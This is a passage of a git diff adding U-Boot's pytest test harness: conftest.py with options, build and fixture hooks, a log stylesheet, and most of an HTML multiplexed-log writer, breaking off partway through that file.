Diffstat (limited to 'test/py')
155 files changed, 22191 insertions, 0 deletions
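The bulk of this series is the new pytest-based harness under test/py, driven by the test.py wrapper added below. Board selection and the optional build step are controlled by the options registered in conftest.py's pytest_addoption() (--build-dir, --board-type/--bd, --board-identity/--id, --build, --buildman, --gdbserver). As a rough usage sketch based on those options (the board name and paths here are illustrative, not taken from this diff):

    $ ./test/py/test.py --bd sandbox --build
    $ ./test/py/test.py --bd some_board --id some_instance --build-dir /path/to/build

The first form builds and runs the sandbox port on the build host; the second runs against an already-built board, with --id distinguishing multiple instances of the same board type.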
diff --git a/test/py/.gitignore b/test/py/.gitignore new file mode 100644 index 00000000000..0d20b6487c6 --- /dev/null +++ b/test/py/.gitignore @@ -0,0 +1 @@ +*.pyc diff --git a/test/py/conftest.py b/test/py/conftest.py new file mode 100644 index 00000000000..fc9dd3a83f8 --- /dev/null +++ b/test/py/conftest.py @@ -0,0 +1,688 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +# Implementation of pytest run-time hook functions. These are invoked by +# pytest at certain points during operation, e.g. startup, for each executed +# test, at shutdown etc. These hooks perform functions such as: +# - Parsing custom command-line options. +# - Pulling in user-specified board configuration. +# - Creating the U-Boot console test fixture. +# - Creating the HTML log file. +# - Monitoring each test's results. +# - Implementing custom pytest markers. + +import atexit +import configparser +import errno +import filelock +import io +import os +import os.path +from pathlib import Path +import pytest +import re +from _pytest.runner import runtestprotocol +import sys + +# Globals: The HTML log file, and the connection to the U-Boot console. +log = None +console = None + +TEST_PY_DIR = os.path.dirname(os.path.abspath(__file__)) + +def mkdir_p(path): + """Create a directory path. + + This includes creating any intermediate/parent directories. Any errors + caused due to already extant directories are ignored. + + Args: + path: The directory path to create. + + Returns: + Nothing. + """ + + try: + os.makedirs(path) + except OSError as exc: + if exc.errno == errno.EEXIST and os.path.isdir(path): + pass + else: + raise + +def pytest_addoption(parser): + """pytest hook: Add custom command-line options to the cmdline parser. + + Args: + parser: The pytest command-line parser. + + Returns: + Nothing. + """ + + parser.addoption('--build-dir', default=None, + help='U-Boot build directory (O=)') + parser.addoption('--result-dir', default=None, + help='U-Boot test result/tmp directory') + parser.addoption('--persistent-data-dir', default=None, + help='U-Boot test persistent generated data directory') + parser.addoption('--board-type', '--bd', '-B', default='sandbox', + help='U-Boot board type') + parser.addoption('--board-identity', '--id', default='na', + help='U-Boot board identity/instance') + parser.addoption('--build', default=False, action='store_true', + help='Compile U-Boot before running tests') + parser.addoption('--buildman', default=False, action='store_true', + help='Use buildman to build U-Boot (assuming --build is given)') + parser.addoption('--gdbserver', default=None, + help='Run sandbox under gdbserver. The argument is the channel '+ + 'over which gdbserver should communicate, e.g. localhost:1234') + +def run_build(config, source_dir, build_dir, board_type, log): + """run_build: Build U-Boot + + Args: + config: The pytest configuration. + source_dir (str): Directory containing source code + build_dir (str): Directory to build in + board_type (str): board_type parameter (e.g.
'sandbox') + log (Logfile): Log file to use + """ + if config.getoption('buildman'): + if build_dir != source_dir: + dest_args = ['-o', build_dir, '-w'] + else: + dest_args = ['-i'] + cmds = (['buildman', '--board', board_type] + dest_args,) + name = 'buildman' + else: + if build_dir != source_dir: + o_opt = 'O=%s' % build_dir + else: + o_opt = '' + cmds = ( + ['make', o_opt, '-s', board_type + '_defconfig'], + ['make', o_opt, '-s', '-j{}'.format(os.cpu_count())], + ) + name = 'make' + + with log.section(name): + runner = log.get_runner(name, sys.stdout) + for cmd in cmds: + runner.run(cmd, cwd=source_dir) + runner.close() + log.status_pass('OK') + +def pytest_xdist_setupnodes(config, specs): + """Clear out any 'done' file from a previous build""" + global build_done_file + build_dir = config.getoption('build_dir') + board_type = config.getoption('board_type') + source_dir = os.path.dirname(os.path.dirname(TEST_PY_DIR)) + if not build_dir: + build_dir = source_dir + '/build-' + board_type + build_done_file = Path(build_dir) / 'build.done' + if build_done_file.exists(): + os.remove(build_done_file) + +def pytest_configure(config): + """pytest hook: Perform custom initialization at startup time. + + Args: + config: The pytest configuration. + + Returns: + Nothing. + """ + def parse_config(conf_file): + """Parse a config file, loading it into the ubconfig container + + Args: + conf_file: Filename to load (within build_dir) + + Raises + Exception if the file does not exist + """ + dot_config = build_dir + '/' + conf_file + if not os.path.exists(dot_config): + raise Exception(conf_file + ' does not exist; ' + + 'try passing --build option?') + + with open(dot_config, 'rt') as f: + ini_str = '[root]\n' + f.read() + ini_sio = io.StringIO(ini_str) + parser = configparser.RawConfigParser() + parser.read_file(ini_sio) + ubconfig.buildconfig.update(parser.items('root')) + + global log + global console + global ubconfig + + source_dir = os.path.dirname(os.path.dirname(TEST_PY_DIR)) + + board_type = config.getoption('board_type') + board_type_filename = board_type.replace('-', '_') + + board_identity = config.getoption('board_identity') + board_identity_filename = board_identity.replace('-', '_') + + build_dir = config.getoption('build_dir') + if not build_dir: + build_dir = source_dir + '/build-' + board_type + mkdir_p(build_dir) + + result_dir = config.getoption('result_dir') + if not result_dir: + result_dir = build_dir + mkdir_p(result_dir) + + persistent_data_dir = config.getoption('persistent_data_dir') + if not persistent_data_dir: + persistent_data_dir = build_dir + '/persistent-data' + mkdir_p(persistent_data_dir) + + gdbserver = config.getoption('gdbserver') + if gdbserver and not board_type.startswith('sandbox'): + raise Exception('--gdbserver only supported with sandbox targets') + + import multiplexed_log + log = multiplexed_log.Logfile(result_dir + '/test-log.html') + + if config.getoption('build'): + worker_id = os.environ.get("PYTEST_XDIST_WORKER") + with filelock.FileLock(os.path.join(build_dir, 'build.lock')): + build_done_file = Path(build_dir) / 'build.done' + if (not worker_id or worker_id == 'master' or + not build_done_file.exists()): + run_build(config, source_dir, build_dir, board_type, log) + build_done_file.touch() + + class ArbitraryAttributeContainer(object): + pass + + ubconfig = ArbitraryAttributeContainer() + ubconfig.brd = dict() + ubconfig.env = dict() + + modules = [ + (ubconfig.brd, 'u_boot_board_' + board_type_filename), + (ubconfig.env, 'u_boot_boardenv_' + 
board_type_filename), + (ubconfig.env, 'u_boot_boardenv_' + board_type_filename + '_' + + board_identity_filename), + ] + for (dict_to_fill, module_name) in modules: + try: + module = __import__(module_name) + except ImportError: + continue + dict_to_fill.update(module.__dict__) + + ubconfig.buildconfig = dict() + + # buildman -k puts autoconf.mk in the rootdir, so handle this as well + # as the standard U-Boot build which leaves it in include/autoconf.mk + parse_config('.config') + if os.path.exists(build_dir + '/' + 'autoconf.mk'): + parse_config('autoconf.mk') + else: + parse_config('include/autoconf.mk') + + ubconfig.test_py_dir = TEST_PY_DIR + ubconfig.source_dir = source_dir + ubconfig.build_dir = build_dir + ubconfig.result_dir = result_dir + ubconfig.persistent_data_dir = persistent_data_dir + ubconfig.board_type = board_type + ubconfig.board_identity = board_identity + ubconfig.gdbserver = gdbserver + ubconfig.dtb = build_dir + '/arch/sandbox/dts/test.dtb' + + env_vars = ( + 'board_type', + 'board_identity', + 'source_dir', + 'test_py_dir', + 'build_dir', + 'result_dir', + 'persistent_data_dir', + ) + for v in env_vars: + os.environ['U_BOOT_' + v.upper()] = getattr(ubconfig, v) + + if board_type.startswith('sandbox'): + import u_boot_console_sandbox + console = u_boot_console_sandbox.ConsoleSandbox(log, ubconfig) + else: + import u_boot_console_exec_attach + console = u_boot_console_exec_attach.ConsoleExecAttach(log, ubconfig) + +re_ut_test_list = re.compile(r'[^a-zA-Z0-9_]_u_boot_list_2_ut_(.*)_test_2_(.*)\s*$') +def generate_ut_subtest(metafunc, fixture_name, sym_path): + """Provide parametrization for a ut_subtest fixture. + + Determines the set of unit tests built into a U-Boot binary by parsing the + list of symbols generated by the build process. Provides this information + to test functions by parameterizing their ut_subtest fixture parameter. + + Args: + metafunc: The pytest test function. + fixture_name: The fixture name to test. + sym_path: Relative path to the symbol file with preceding '/' + (e.g. '/u-boot.sym') + + Returns: + Nothing. + """ + fn = console.config.build_dir + sym_path + try: + with open(fn, 'rt') as f: + lines = f.readlines() + except: + lines = [] + lines.sort() + + vals = [] + for l in lines: + m = re_ut_test_list.search(l) + if not m: + continue + suite, name = m.groups() + + # Tests marked with _norun should only be run manually using 'ut -f' + if name.endswith('_norun'): + continue + + vals.append(f'{suite} {name}') + + ids = ['ut_' + s.replace(' ', '_') for s in vals] + metafunc.parametrize(fixture_name, vals, ids=ids) + +def generate_config(metafunc, fixture_name): + """Provide parametrization for {env,brd}__ fixtures. + + If a test function takes parameter(s) (fixture names) of the form brd__xxx + or env__xxx, the brd and env configuration dictionaries are consulted to + find the list of values to use for those parameters, and the test is + parametrized so that it runs once for each combination of values. + + Args: + metafunc: The pytest test function. + fixture_name: The fixture name to test. + + Returns: + Nothing. + """ + + subconfigs = { + 'brd': console.config.brd, + 'env': console.config.env, + } + parts = fixture_name.split('__') + if len(parts) < 2: + return + if parts[0] not in subconfigs: + return + subconfig = subconfigs[parts[0]] + vals = [] + val = subconfig.get(fixture_name, []) + # If that exact name is a key in the data source: + if val: + # ... use the dict value as a single parameter value. + vals = (val, ) + else: + # ... 
otherwise, see if there's a key that contains a list of + # values to use instead. + vals = subconfig.get(fixture_name+ 's', []) + def fixture_id(index, val): + try: + return val['fixture_id'] + except: + return fixture_name + str(index) + ids = [fixture_id(index, val) for (index, val) in enumerate(vals)] + metafunc.parametrize(fixture_name, vals, ids=ids) + +def pytest_generate_tests(metafunc): + """pytest hook: parameterize test functions based on custom rules. + + Check each test function parameter (fixture name) to see if it is one of + our custom names, and if so, provide the correct parametrization for that + parameter. + + Args: + metafunc: The pytest test function. + + Returns: + Nothing. + """ + for fn in metafunc.fixturenames: + if fn == 'ut_subtest': + generate_ut_subtest(metafunc, fn, '/u-boot.sym') + continue + m_subtest = re.match('ut_(.)pl_subtest', fn) + if m_subtest: + spl_name = m_subtest.group(1) + generate_ut_subtest( + metafunc, fn, f'/{spl_name}pl/u-boot-{spl_name}pl.sym') + continue + generate_config(metafunc, fn) + +@pytest.fixture(scope='session') +def u_boot_log(request): + """Generate the value of a test's log fixture. + + Args: + request: The pytest request. + + Returns: + The fixture value. + """ + + return console.log + +@pytest.fixture(scope='session') +def u_boot_config(request): + """Generate the value of a test's u_boot_config fixture. + + Args: + request: The pytest request. + + Returns: + The fixture value. + """ + + return console.config + +@pytest.fixture(scope='function') +def u_boot_console(request): + """Generate the value of a test's u_boot_console fixture. + + Args: + request: The pytest request. + + Returns: + The fixture value. + """ + + console.ensure_spawned() + return console + +anchors = {} +tests_not_run = [] +tests_failed = [] +tests_xpassed = [] +tests_xfailed = [] +tests_skipped = [] +tests_warning = [] +tests_passed = [] + +def pytest_itemcollected(item): + """pytest hook: Called once for each test found during collection. + + This enables our custom result analysis code to see the list of all tests + that should eventually be run. + + Args: + item: The item that was collected. + + Returns: + Nothing. + """ + + tests_not_run.append(item.name) + +def cleanup(): + """Clean up all global state. + + Executed (via atexit) once the entire test process is complete. This + includes logging the status of all tests, and the identity of any failed + or skipped tests. + + Args: + None. + + Returns: + Nothing. + """ + + if console: + console.close() + if log: + with log.section('Status Report', 'status_report'): + log.status_pass('%d passed' % len(tests_passed)) + if tests_warning: + log.status_warning('%d passed with warning' % len(tests_warning)) + for test in tests_warning: + anchor = anchors.get(test, None) + log.status_warning('... ' + test, anchor) + if tests_skipped: + log.status_skipped('%d skipped' % len(tests_skipped)) + for test in tests_skipped: + anchor = anchors.get(test, None) + log.status_skipped('... ' + test, anchor) + if tests_xpassed: + log.status_xpass('%d xpass' % len(tests_xpassed)) + for test in tests_xpassed: + anchor = anchors.get(test, None) + log.status_xpass('... ' + test, anchor) + if tests_xfailed: + log.status_xfail('%d xfail' % len(tests_xfailed)) + for test in tests_xfailed: + anchor = anchors.get(test, None) + log.status_xfail('... ' + test, anchor) + if tests_failed: + log.status_fail('%d failed' % len(tests_failed)) + for test in tests_failed: + anchor = anchors.get(test, None) + log.status_fail('... 
' + test, anchor) + if tests_not_run: + log.status_fail('%d not run' % len(tests_not_run)) + for test in tests_not_run: + anchor = anchors.get(test, None) + log.status_fail('... ' + test, anchor) + log.close() +atexit.register(cleanup) + +def setup_boardspec(item): + """Process any 'boardspec' marker for a test. + + Such a marker lists the set of board types that a test does/doesn't + support. If tests are being executed on an unsupported board, the test is + marked to be skipped. + + Args: + item: The pytest test item. + + Returns: + Nothing. + """ + + required_boards = [] + for boards in item.iter_markers('boardspec'): + board = boards.args[0] + if board.startswith('!'): + if ubconfig.board_type == board[1:]: + pytest.skip('board "%s" not supported' % ubconfig.board_type) + return + else: + required_boards.append(board) + if required_boards and ubconfig.board_type not in required_boards: + pytest.skip('board "%s" not supported' % ubconfig.board_type) + +def setup_buildconfigspec(item): + """Process any 'buildconfigspec' marker for a test. + + Such a marker lists some U-Boot configuration feature that the test + requires. If tests are being executed on an U-Boot build that doesn't + have the required feature, the test is marked to be skipped. + + Args: + item: The pytest test item. + + Returns: + Nothing. + """ + + for options in item.iter_markers('buildconfigspec'): + option = options.args[0] + if not ubconfig.buildconfig.get('config_' + option.lower(), None): + pytest.skip('.config feature "%s" not enabled' % option.lower()) + for options in item.iter_markers('notbuildconfigspec'): + option = options.args[0] + if ubconfig.buildconfig.get('config_' + option.lower(), None): + pytest.skip('.config feature "%s" enabled' % option.lower()) + +def tool_is_in_path(tool): + for path in os.environ["PATH"].split(os.pathsep): + fn = os.path.join(path, tool) + if os.path.isfile(fn) and os.access(fn, os.X_OK): + return True + return False + +def setup_requiredtool(item): + """Process any 'requiredtool' marker for a test. + + Such a marker lists some external tool (binary, executable, application) + that the test requires. If tests are being executed on a system that + doesn't have the required tool, the test is marked to be skipped. + + Args: + item: The pytest test item. + + Returns: + Nothing. + """ + + for tools in item.iter_markers('requiredtool'): + tool = tools.args[0] + if not tool_is_in_path(tool): + pytest.skip('tool "%s" not in $PATH' % tool) + +def setup_singlethread(item): + """Process any 'singlethread' marker for a test. + + Skip this test if running in parallel. + + Args: + item: The pytest test item. + + Returns: + Nothing. + """ + for single in item.iter_markers('singlethread'): + worker_id = os.environ.get("PYTEST_XDIST_WORKER") + if worker_id and worker_id != 'master': + pytest.skip('must run single-threaded') + +def start_test_section(item): + anchors[item.name] = log.start_section(item.name) + +def pytest_runtest_setup(item): + """pytest hook: Configure (set up) a test item. + + Called once for each test to perform any custom configuration. This hook + is used to skip the test if certain conditions apply. + + Args: + item: The pytest test item. + + Returns: + Nothing. + """ + + start_test_section(item) + setup_boardspec(item) + setup_buildconfigspec(item) + setup_requiredtool(item) + setup_singlethread(item) + +def pytest_runtest_protocol(item, nextitem): + """pytest hook: Called to execute a test. 
+ + This hook wraps the standard pytest runtestprotocol() function in order + to acquire visibility into, and record, each test function's result. + + Args: + item: The pytest test item to execute. + nextitem: The pytest test item that will be executed after this one. + + Returns: + A list of pytest reports (test result data). + """ + + log.get_and_reset_warning() + ihook = item.ihook + ihook.pytest_runtest_logstart(nodeid=item.nodeid, location=item.location) + reports = runtestprotocol(item, nextitem=nextitem) + ihook.pytest_runtest_logfinish(nodeid=item.nodeid, location=item.location) + was_warning = log.get_and_reset_warning() + + # In pytest 3, runtestprotocol() may not call pytest_runtest_setup() if + # the test is skipped. That call is required to create the test's section + # in the log file. The call to log.end_section() requires that the log + # contain a section for this test. Create a section for the test if it + # doesn't already exist. + if not item.name in anchors: + start_test_section(item) + + failure_cleanup = False + if not was_warning: + test_list = tests_passed + msg = 'OK' + msg_log = log.status_pass + else: + test_list = tests_warning + msg = 'OK (with warning)' + msg_log = log.status_warning + for report in reports: + if report.outcome == 'failed': + if hasattr(report, 'wasxfail'): + test_list = tests_xpassed + msg = 'XPASSED' + msg_log = log.status_xpass + else: + failure_cleanup = True + test_list = tests_failed + msg = 'FAILED:\n' + str(report.longrepr) + msg_log = log.status_fail + break + if report.outcome == 'skipped': + if hasattr(report, 'wasxfail'): + failure_cleanup = True + test_list = tests_xfailed + msg = 'XFAILED:\n' + str(report.longrepr) + msg_log = log.status_xfail + break + test_list = tests_skipped + msg = 'SKIPPED:\n' + str(report.longrepr) + msg_log = log.status_skipped + + if failure_cleanup: + console.drain_console() + + test_list.append(item.name) + tests_not_run.remove(item.name) + + try: + msg_log(msg) + except: + # If something went wrong with logging, it's better to let the test + # process continue, which may report other exceptions that triggered + # the logging issue (e.g. console.log wasn't created). Hence, just + # squash the exception. If the test setup failed due to e.g. syntax + # error somewhere else, this won't be seen. However, once that issue + # is fixed, if this exception still exists, it will then be logged as + # part of the test's stdout. + import traceback + print('Exception occurred while logging runtest status:') + traceback.print_exc() + # FIXME: Can we force a test failure here? + + log.end_section(item.name) + + if failure_cleanup: + console.cleanup_spawn() + + return True diff --git a/test/py/multiplexed_log.css b/test/py/multiplexed_log.css new file mode 100644 index 00000000000..3db99272235 --- /dev/null +++ b/test/py/multiplexed_log.css @@ -0,0 +1,108 @@ +/* SPDX-License-Identifier: GPL-2.0 */ +/* + * Copyright (c) 2015 Stephen Warren + * Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + */ + +/* + * This provides pretty formatting of the HTML log file, e.g. + * - colored bars beside/above log sections for easily parsed delineation. + * - color highlighting of various messages. 
+ */ + +body { + background-color: black; + color: #ffffff; +} + +pre { + margin-top: 0px; + margin-bottom: 0px; +} + +.implicit { + color: #808080; +} + +.block { + border-style: solid; + border-color: #303030; + border-width: 0px 0px 0px 5px; + padding-left: 5px +} + +.block-header { + background-color: #303030; + margin-left: -5px; + margin-top: 5px; +} + +.block-header:hover { + text-decoration: underline; +} + +.block-trailer { + display: none; +} + +.error { + color: #ff0000 +} + +.warning { + color: #ffff00 +} + +.info { + color: #808080 +} + +.action { + color: #8080ff +} + +.timestamp { + color: #8080ff +} + +.status-pass { + color: #00ff00 +} + +.status-warning { + color: #ffff00 +} + +.status-skipped { + color: #ffff00 +} + +.status-xfail { + color: #ff7f00 +} + +.status-xpass { + color: #ff7f00 +} + +.status-fail { + color: #ff0000 +} + +.hidden { + display: none; +} + +a:link { + text-decoration: inherit; + color: inherit; +} + +a:visited { + text-decoration: inherit; + color: inherit; +} + +a:hover { + text-decoration: underline; +} diff --git a/test/py/multiplexed_log.py b/test/py/multiplexed_log.py new file mode 100644 index 00000000000..63237594bb4 --- /dev/null +++ b/test/py/multiplexed_log.py @@ -0,0 +1,714 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +""" +Generate an HTML-formatted log file containing multiple streams of data, +each represented in a well-delineated/-structured fashion. +""" + +import datetime +import html +import os.path +import shutil +import subprocess + +mod_dir = os.path.dirname(os.path.abspath(__file__)) + +class LogfileStream(object): + """A file-like object used to write a single logical stream of data into + a multiplexed log file. Objects of this type should be created by factory + functions in the Logfile class rather than directly.""" + + def __init__(self, logfile, name, chained_file): + """Initialize a new object. + + Args: + logfile: The Logfile object to log to. + name: The name of this log stream. + chained_file: The file-like object to which all stream data should be + logged to in addition to logfile. Can be None. + + Returns: + Nothing. + """ + + self.logfile = logfile + self.name = name + self.chained_file = chained_file + + def close(self): + """Dummy function so that this class is "file-like". + + Args: + None. + + Returns: + Nothing. + """ + + pass + + def write(self, data, implicit=False): + """Write data to the log stream. + + Args: + data: The data to write to the file. + implicit: Boolean indicating whether data actually appeared in the + stream, or was implicitly generated. A valid use-case is to + repeat a shell prompt at the start of each separate log + section, which makes the log sections more readable in + isolation. + + Returns: + Nothing. + """ + + self.logfile.write(self, data, implicit) + if self.chained_file: + # Chained file is console, convert things a little + self.chained_file.write((data.encode('ascii', 'replace')).decode()) + + def flush(self): + """Flush the log stream, to ensure correct log interleaving. + + Args: + None. + + Returns: + Nothing. + """ + + self.logfile.flush() + if self.chained_file: + self.chained_file.flush() + +class RunAndLog(object): + """A utility object used to execute sub-processes and log their output to + a multiplexed log file. 
Objects of this type should be created by factory + functions in the Logfile class rather than directly.""" + + def __init__(self, logfile, name, chained_file): + """Initialize a new object. + + Args: + logfile: The Logfile object to log to. + name: The name of this log stream or sub-process. + chained_file: The file-like object to which all stream data should + be logged to in addition to logfile. Can be None. + + Returns: + Nothing. + """ + + self.logfile = logfile + self.name = name + self.chained_file = chained_file + self.output = None + self.exit_status = None + + def close(self): + """Clean up any resources managed by this object.""" + pass + + def run(self, cmd, cwd=None, ignore_errors=False, stdin=None, env=None): + """Run a command as a sub-process, and log the results. + + The output is available at self.output which can be useful if there is + an exception. + + Args: + cmd: The command to execute. + cwd: The directory to run the command in. Can be None to use the + current directory. + ignore_errors: Indicate whether to ignore errors. If True, the + function will simply return if the command cannot be executed + or exits with an error code, otherwise an exception will be + raised if such problems occur. + stdin: Input string to pass to the command as stdin (or None) + env: Environment to use, or None to use the current one + + Returns: + The output as a string. + """ + + msg = '+' + ' '.join(cmd) + '\n' + if self.chained_file: + self.chained_file.write(msg) + self.logfile.write(self, msg) + + try: + p = subprocess.Popen(cmd, cwd=cwd, + stdin=subprocess.PIPE if stdin else None, + stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env) + (stdout, stderr) = p.communicate(input=stdin) + if stdout is not None: + stdout = stdout.decode('utf-8') + if stderr is not None: + stderr = stderr.decode('utf-8') + output = '' + if stdout: + if stderr: + output += 'stdout:\n' + output += stdout + if stderr: + if stdout: + output += 'stderr:\n' + output += stderr + exit_status = p.returncode + exception = None + except subprocess.CalledProcessError as cpe: + output = cpe.output + exit_status = cpe.returncode + exception = cpe + except Exception as e: + output = '' + exit_status = 0 + exception = e + if output and not output.endswith('\n'): + output += '\n' + if exit_status and not exception and not ignore_errors: + exception = ValueError('Exit code: ' + str(exit_status)) + if exception: + output += str(exception) + '\n' + self.logfile.write(self, output) + if self.chained_file: + self.chained_file.write(output) + self.logfile.timestamp() + + # Store the output so it can be accessed if we raise an exception. + self.output = output + self.exit_status = exit_status + if exception: + raise exception + return output + +class SectionCtxMgr: + """A context manager for Python's "with" statement, which allows a certain + portion of test code to be logged to a separate section of the log file. + Objects of this type should be created by factory functions in the Logfile + class rather than directly.""" + + def __init__(self, log, marker, anchor): + """Initialize a new object. + + Args: + log: The Logfile object to log to. + marker: The name of the nested log section. + anchor: The anchor value to pass to start_section(). + + Returns: + Nothing. 
+ """ + + self.log = log + self.marker = marker + self.anchor = anchor + + def __enter__(self): + self.anchor = self.log.start_section(self.marker, self.anchor) + + def __exit__(self, extype, value, traceback): + self.log.end_section(self.marker) + +class Logfile: + """Generates an HTML-formatted log file containing multiple streams of + data, each represented in a well-delineated/-structured fashion.""" + + def __init__(self, fn): + """Initialize a new object. + + Args: + fn: The filename to write to. + + Returns: + Nothing. + """ + + self.f = open(fn, 'wt', encoding='utf-8') + self.last_stream = None + self.blocks = [] + self.cur_evt = 1 + self.anchor = 0 + self.timestamp_start = self._get_time() + self.timestamp_prev = self.timestamp_start + self.timestamp_blocks = [] + self.seen_warning = False + + shutil.copy(mod_dir + '/multiplexed_log.css', os.path.dirname(fn)) + self.f.write('''\ +<html> +<head> +<link rel="stylesheet" type="text/css" href="multiplexed_log.css"> +<script src="http://code.jquery.com/jquery.min.js"></script> +<script> +$(document).ready(function () { + // Copy status report HTML to start of log for easy access + sts = $(".block#status_report")[0].outerHTML; + $("tt").prepend(sts); + + // Add expand/contract buttons to all block headers + btns = "<span class=\\\"block-expand hidden\\\">[+] </span>" + + "<span class=\\\"block-contract\\\">[-] </span>"; + $(".block-header").prepend(btns); + + // Pre-contract all blocks which passed, leaving only problem cases + // expanded, to highlight issues the user should look at. + // Only top-level blocks (sections) should have any status + passed_bcs = $(".block-content:has(.status-pass)"); + // Some blocks might have multiple status entries (e.g. the status + // report), so take care not to hide blocks with partial success. + passed_bcs = passed_bcs.not(":has(.status-fail)"); + passed_bcs = passed_bcs.not(":has(.status-xfail)"); + passed_bcs = passed_bcs.not(":has(.status-xpass)"); + passed_bcs = passed_bcs.not(":has(.status-skipped)"); + passed_bcs = passed_bcs.not(":has(.status-warning)"); + // Hide the passed blocks + passed_bcs.addClass("hidden"); + // Flip the expand/contract button hiding for those blocks. + bhs = passed_bcs.parent().children(".block-header") + bhs.children(".block-expand").removeClass("hidden"); + bhs.children(".block-contract").addClass("hidden"); + + // Add click handler to block headers. + // The handler expands/contracts the block. + $(".block-header").on("click", function (e) { + var header = $(this); + var content = header.next(".block-content"); + var expanded = !content.hasClass("hidden"); + if (expanded) { + content.addClass("hidden"); + header.children(".block-expand").first().removeClass("hidden"); + header.children(".block-contract").first().addClass("hidden"); + } else { + header.children(".block-contract").first().removeClass("hidden"); + header.children(".block-expand").first().addClass("hidden"); + content.removeClass("hidden"); + } + }); + + // When clicking on a link, expand the target block + $("a").on("click", function (e) { + var block = $($(this).attr("href")); + var header = block.children(".block-header"); + var content = block.children(".block-content").first(); + header.children(".block-contract").first().removeClass("hidden"); + header.children(".block-expand").first().addClass("hidden"); + content.removeClass("hidden"); + }); +}); +</script> +</head> +<body> +<tt> +''') + + def close(self): + """Close the log file. 
+ + After calling this function, no more data may be written to the log. + + Args: + None. + + Returns: + Nothing. + """ + + self.f.write('''\ +</tt> +</body> +</html> +''') + self.f.close() + + # The set of characters that should be represented as hexadecimal codes in + # the log file. + _nonprint = {ord('%')} + _nonprint.update(c for c in range(0, 32) if c not in (9, 10)) + _nonprint.update(range(127, 256)) + + def _escape(self, data): + """Render data format suitable for inclusion in an HTML document. + + This includes HTML-escaping certain characters, and translating + control characters to a hexadecimal representation. + + Args: + data: The raw string data to be escaped. + + Returns: + An escaped version of the data. + """ + + data = data.replace(chr(13), '') + data = ''.join((ord(c) in self._nonprint) and ('%%%02x' % ord(c)) or + c for c in data) + data = html.escape(data) + return data + + def _terminate_stream(self): + """Write HTML to the log file to terminate the current stream's data. + + Args: + None. + + Returns: + Nothing. + """ + + self.cur_evt += 1 + if not self.last_stream: + return + self.f.write('</pre>\n') + self.f.write('<div class="stream-trailer block-trailer">End stream: ' + + self.last_stream.name + '</div>\n') + self.f.write('</div>\n') + self.f.write('</div>\n') + self.last_stream = None + + def _note(self, note_type, msg, anchor=None): + """Write a note or one-off message to the log file. + + Args: + note_type: The type of note. This must be a value supported by the + accompanying multiplexed_log.css. + msg: The note/message to log. + anchor: Optional internal link target. + + Returns: + Nothing. + """ + + self._terminate_stream() + self.f.write('<div class="' + note_type + '">\n') + self.f.write('<pre>') + if anchor: + self.f.write('<a href="#%s">' % anchor) + self.f.write(self._escape(msg)) + if anchor: + self.f.write('</a>') + self.f.write('\n</pre>\n') + self.f.write('</div>\n') + + def start_section(self, marker, anchor=None): + """Begin a new nested section in the log file. + + Args: + marker: The name of the section that is starting. + anchor: The value to use for the anchor. If None, a unique value + will be calculated and used + + Returns: + Name of the HTML anchor emitted before section. + """ + + self._terminate_stream() + self.blocks.append(marker) + self.timestamp_blocks.append(self._get_time()) + if not anchor: + self.anchor += 1 + anchor = str(self.anchor) + blk_path = '/'.join(self.blocks) + self.f.write('<div class="section block" id="' + anchor + '">\n') + self.f.write('<div class="section-header block-header">Section: ' + + blk_path + '</div>\n') + self.f.write('<div class="section-content block-content">\n') + self.timestamp() + + return anchor + + def end_section(self, marker): + """Terminate the current nested section in the log file. + + This function validates proper nesting of start_section() and + end_section() calls. If a mismatch is found, an exception is raised. + + Args: + marker: The name of the section that is ending. + + Returns: + Nothing. 
+ """ + + if (not self.blocks) or (marker != self.blocks[-1]): + raise Exception('Block nesting mismatch: "%s" "%s"' % + (marker, '/'.join(self.blocks))) + self._terminate_stream() + timestamp_now = self._get_time() + timestamp_section_start = self.timestamp_blocks.pop() + delta_section = timestamp_now - timestamp_section_start + self._note("timestamp", + "TIME: SINCE-SECTION: " + str(delta_section)) + blk_path = '/'.join(self.blocks) + self.f.write('<div class="section-trailer block-trailer">' + + 'End section: ' + blk_path + '</div>\n') + self.f.write('</div>\n') + self.f.write('</div>\n') + self.blocks.pop() + + def section(self, marker, anchor=None): + """Create a temporary section in the log file. + + This function creates a context manager for Python's "with" statement, + which allows a certain portion of test code to be logged to a separate + section of the log file. + + Usage: + with log.section("somename"): + some test code + + Args: + marker: The name of the nested section. + anchor: The anchor value to pass to start_section(). + + Returns: + A context manager object. + """ + + return SectionCtxMgr(self, marker, anchor) + + def error(self, msg): + """Write an error note to the log file. + + Args: + msg: A message describing the error. + + Returns: + Nothing. + """ + + self._note("error", msg) + + def warning(self, msg): + """Write an warning note to the log file. + + Args: + msg: A message describing the warning. + + Returns: + Nothing. + """ + + self.seen_warning = True + self._note("warning", msg) + + def get_and_reset_warning(self): + """Get and reset the log warning flag. + + Args: + None + + Returns: + Whether a warning was seen since the last call. + """ + + ret = self.seen_warning + self.seen_warning = False + return ret + + def info(self, msg): + """Write an informational note to the log file. + + Args: + msg: An informational message. + + Returns: + Nothing. + """ + + self._note("info", msg) + + def action(self, msg): + """Write an action note to the log file. + + Args: + msg: A message describing the action that is being logged. + + Returns: + Nothing. + """ + + self._note("action", msg) + + def _get_time(self): + return datetime.datetime.now() + + def timestamp(self): + """Write a timestamp to the log file. + + Args: + None + + Returns: + Nothing. + """ + + timestamp_now = self._get_time() + delta_prev = timestamp_now - self.timestamp_prev + delta_start = timestamp_now - self.timestamp_start + self.timestamp_prev = timestamp_now + + self._note("timestamp", + "TIME: NOW: " + timestamp_now.strftime("%Y/%m/%d %H:%M:%S.%f")) + self._note("timestamp", + "TIME: SINCE-PREV: " + str(delta_prev)) + self._note("timestamp", + "TIME: SINCE-START: " + str(delta_start)) + + def status_pass(self, msg, anchor=None): + """Write a note to the log file describing test(s) which passed. + + Args: + msg: A message describing the passed test(s). + anchor: Optional internal link target. + + Returns: + Nothing. + """ + + self._note("status-pass", msg, anchor) + + def status_warning(self, msg, anchor=None): + """Write a note to the log file describing test(s) which passed. + + Args: + msg: A message describing the passed test(s). + anchor: Optional internal link target. + + Returns: + Nothing. + """ + + self._note("status-warning", 